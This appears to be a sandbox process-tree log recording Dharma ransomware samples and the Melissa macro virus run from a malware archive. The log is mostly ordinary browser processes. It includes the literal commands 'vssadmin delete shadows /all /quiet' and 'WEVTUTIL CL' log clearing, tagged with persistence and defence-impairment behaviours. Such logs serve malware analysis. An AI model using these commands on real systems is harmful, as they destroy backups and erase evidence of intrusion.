C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3256 /prefetch:12⤵PID:2400
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5124 /prefetch:12⤵PID:1788
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5648 /prefetch:82⤵PID:1956
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5648 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1848
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5368 /prefetch:12⤵PID:1496
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4776 /prefetch:12⤵PID:4836
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5112 /prefetch:12⤵PID:1672
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5200 /prefetch:12⤵PID:3768
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5792 /prefetch:12⤵PID:3516
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6432 /prefetch:12⤵PID:3648
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3140 /prefetch:12⤵PID:2344
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:12⤵PID:1948
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5140 /prefetch:12⤵PID:5956
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6356 /prefetch:12⤵PID:6004
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5736 /prefetch:12⤵PID:336
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5056 /prefetch:12⤵PID:5688
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4976 /prefetch:12⤵PID:3156
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2000 /prefetch:12⤵PID:3028
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5872 /prefetch:82⤵PID:856
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6768 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:5440
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3124 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5152
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3604
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4360
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SendNotifyMessage
PID:5572 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffe9c48cc40,0x7ffe9c48cc4c,0x7ffe9c48cc582⤵PID:3916
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1892,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1888 /prefetch:22⤵PID:1616
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2028,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2152 /prefetch:32⤵PID:5756
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1752,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1772 /prefetch:82⤵PID:5832
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3156,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3176 /prefetch:12⤵PID:4232
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3268,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3260 /prefetch:12⤵PID:2772
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4564,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4548 /prefetch:12⤵PID:3632
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4744,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4720 /prefetch:82⤵PID:432
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4732,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4836 /prefetch:82⤵PID:4492
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5052,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5060 /prefetch:82⤵PID:5416
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4940,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4892 /prefetch:82⤵PID:4044
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5068,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5064 /prefetch:82⤵PID:3748
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5172,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5164 /prefetch:82⤵PID:4504
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5076,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5368 /prefetch:82⤵PID:5640
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5364,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5064 /prefetch:82⤵PID:5192
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5080,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5684 /prefetch:22⤵PID:1300
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=5008,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4456 /prefetch:12⤵PID:6112
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=5380,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4796 /prefetch:12⤵PID:5344
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5856,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5960 /prefetch:82⤵PID:2204
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=3264,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5028 /prefetch:12⤵PID:5916
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=5984,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4992 /prefetch:12⤵PID:3436
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3380,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5548 /prefetch:82⤵PID:3176
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4972,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5268 /prefetch:82⤵PID:624
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --field-trial-handle=5484,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5620 /prefetch:12⤵PID:5044
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --field-trial-handle=5964,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=6060 /prefetch:12⤵PID:5160
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --field-trial-handle=5320,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3500 /prefetch:12⤵PID:5468
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3368,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3344 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5624
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --field-trial-handle=240,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4460 /prefetch:12⤵PID:5460
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --field-trial-handle=5152,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5124 /prefetch:12⤵PID:2620
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5132,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5784 /prefetch:82⤵PID:3000
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --field-trial-handle=3324,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5724 /prefetch:12⤵PID:5124
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3308,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5136 /prefetch:82⤵PID:5164
-
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:5276
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:3708
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4712
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Virus\Melissa.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2068
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\*\" -ad -an -ai#7zMap1880:30696:7zEvent132811⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
PID:4868
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c82192ee-6cb5-4bc0-9ef0-fb818773790a} -Embedding1⤵PID:5452
-
C:\Users\Admin\Documents\Dharma\EVER\1saas\1sass.exe"C:\Users\Admin\Documents\Dharma\EVER\1saas\1sass.exe"1⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3036 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"2⤵PID:2532
-
C:\Windows\system32\mode.commode con cp select=12513⤵PID:8480
-
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet3⤵
- Interacts with shadow copies
PID:11172
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"2⤵PID:4508
-
C:\Windows\system32\mode.commode con cp select=12513⤵PID:8492
-
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet3⤵
- Interacts with shadow copies
PID:6596
-
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"2⤵PID:7448
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"2⤵PID:7200
-
-
C:\Users\Admin\Documents\Dharma\mssql2.exe"C:\Users\Admin\Documents\Dharma\mssql2.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3684
-
C:\Users\Admin\Documents\Dharma\nc123.exe"C:\Users\Admin\Documents\Dharma\nc123.exe"1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1436
-
C:\Users\Admin\Documents\Dharma\mssql.exe"C:\Users\Admin\Documents\Dharma\mssql.exe"1⤵
- Sets service image path in registry
- Executes dropped EXE
- Impair Defenses: Safe Mode Boot
- Suspicious behavior: LoadsDriver
- Suspicious use of SetWindowsHookEx
PID:3904
-
C:\Users\Admin\Documents\Dharma\EVER\SearchHost.exe"C:\Users\Admin\Documents\Dharma\EVER\SearchHost.exe"1⤵
- Executes dropped EXE
- Enumerates connected drives
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:6172
-
C:\Users\Admin\Documents\Dharma\unlocker.exe"C:\Users\Admin\Documents\Dharma\unlocker.exe"1⤵
- Executes dropped EXE
PID:6768 -
C:\Users\Admin\AppData\Local\Temp\is-ROG96.tmp\unlocker.tmp"C:\Users\Admin\AppData\Local\Temp\is-ROG96.tmp\unlocker.tmp" /SL5="$305E4,1939817,139776,C:\Users\Admin\Documents\Dharma\unlocker.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:7752
-
-
C:\Users\Admin\Documents\Dharma\EVER\1saas\LogDelete.exe"C:\Users\Admin\Documents\Dharma\EVER\1saas\LogDelete.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
PID:8640 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Test\Logdelete.bat" "2⤵PID:6156
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WEVTUTIL EL3⤵
- System Location Discovery: System Language Discovery
PID:7508 -
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL EL4⤵PID:8716
-
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "AMSI/Debug"3⤵PID:6804
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "AirSpaceChannel"3⤵PID:6376
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Analytic"3⤵PID:7572
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Application"3⤵
- Clears Windows event logs
PID:7308
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "DirectShowFilterGraph"3⤵PID:6604
-
-
